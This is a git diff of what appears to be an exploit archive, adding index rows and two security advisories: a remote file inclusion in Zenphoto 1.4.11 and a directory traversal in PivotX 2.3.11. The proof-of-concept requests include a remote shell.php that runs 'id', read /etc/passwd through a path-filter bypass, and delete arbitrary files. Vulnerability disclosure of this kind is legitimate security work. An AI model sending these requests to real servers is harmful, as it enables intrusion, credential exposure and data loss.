diff --git a/files.csv b/files.csv index 5e03f29d5..4fc0672fd 100755 --- a/files.csv +++ b/files.csv @@ -13243,6 +13243,7 @@ id,file,description,date,author,platform,type,port 15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0 +39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -33347,7 +33348,7 @@ id,file,description,date,author,platform,type,port 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0 -36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0 +36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0 36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 @@ -35803,3 +35804,4 @@ id,file,description,date,author,platform,type,port 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443 39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 +39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 diff --git a/platforms/php/webapps/39571.txt b/platforms/php/webapps/39571.txt new file mode 100755 index 000000000..9931f9375 --- /dev/null +++ b/platforms/php/webapps/39571.txt @@ -0,0 +1,105 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: Zenphoto 1.4.11 +Fixed in: 1.4.12 +Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/ + zenphoto-1.4.12.zip +Vendor Website: http://www.zenphoto.org/ +Vulnerability Type: RFI +Remote Exploitable: Yes +Reported to vendor: 01/29/2016 +Disclosed to 03/15/2016 +public: +Release mode: Coordinated Release +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is +vulnerable to remote file inclusion. An admin account is required. + +3. Details + +Description + +CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C + +When downloading a log file, the input is not properly sanitized, leading to +RFI. + +An admin account is required, and allow_url_fopen must be set to true - which +is the default setting. + +In old versions of PHP, this would additionally lead to LFI via null byte +poisoning or path expansion, regardless of allow_url_fopen settings. + +Proof of Concept + +GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page= +logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename= +security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1 + +Code + +// admin-logs.php (sanitize(x, 3) only strips out tags) + case 'download_log': + $zipname = sanitize($_GET['tab'], 3) . '.zip'; + if (class_exists('ZipArchive')) { + $zip = new ZipArchive; + $zip->open($zipname, ZipArchive::CREATE); + $zip->addFile($file, basename($file)); + $zip->close(); + ob_get_clean(); + header("Pragma: public"); + header("Expires: 0"); + header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); + header("Cache-Control: private", false); + header("Content-Type: application/zip"); + header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" ); + header("Content-Transfer-Encoding: binary"); + header("Content-Length: " . filesize($zipname)); + readfile($zipname); + // remove zip file from temp path + unlink($zipname); + exit; + } else { + include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php'); + $zip = new ZipStream($zipname); + $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file)); + $zip->finish(); + } + break; + +4. Solution + +To mitigate this issue please upgrade at least to version 1.4.12: + +https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip + +Please note that a newer version might already be available. + +5. Report Timeline + +01/29/2016 Informed Vendor about Issue +01/29/2016 Vendor replies +02/23/2016 Vendor sends fix for verification +02/23/2016 Suggested improvements for attempted fix +02/29/2016 Delayed Disclosure +03/14/2016 Vendor releases fix +03/15/2016 Disclosed to public + + +Blog Reference: +https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html + +-- +blog: https://blog.curesec.com +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Romain-Rolland-Str 14-24 +13089 Berlin, Germany \ No newline at end of file diff --git a/platforms/php/webapps/39572.txt b/platforms/php/webapps/39572.txt new file mode 100755 index 000000000..9678782cc --- /dev/null +++ b/platforms/php/webapps/39572.txt @@ -0,0 +1,78 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: PivotX 2.3.11 +Fixed in: not fixed +Fixed Version Link: n/a +Vendor Website: http://pivotx.net/ +Vulnerability Type: Directory Traversal +Remote Exploitable: Yes +Reported to vendor: 01/20/2016 +Disclosed to public: 03/15/2016 +Release mode: Full Disclosure +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is +vulnerable to Directory Traversal, allowing authenticated users to read and +delete files outside of the PivotX directory. + +3. Details + +Description + +CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N + +The function cleanPath which is responsible for sanitizing path names can be +bypassed by an attacker, leading to directory traversal in multiple places. + +Proof of Concept + +Admins and Superadmins can read any file: + +http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir= +L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../ +/.....//...//.....//...//.....//...//.....//...//etc/passwd + +Advanced users, Admins and Superadmins can delete any file, possibly leading to +DOS: + +http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../ +/.....//...//.....//...//.....//...//.....//...//.....//...//important/ +important.file&pivotxsession=ovyyn4ob2jc5ym92 + +Code + +lib.php +function cleanPath($path) { + $path = str_replace('../', '', $path); + $path = str_replace('..\\', '', $path); + $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path); + return $path; +} + +4. Solution + +This issue was not fixed by the vendor. + +5. Report Timeline + +01/20/2016 Informed Vendor about Issue +01/29/2016 Vendor replies, PivotX is not maintained anymore +03/15/2016 Disclosed to public + + +Blog Reference: +https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html + +-- +blog: https://blog.curesec.com +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Romain-Rolland-Str 14-24 +13089 Berlin, Germany \ No newline at end of file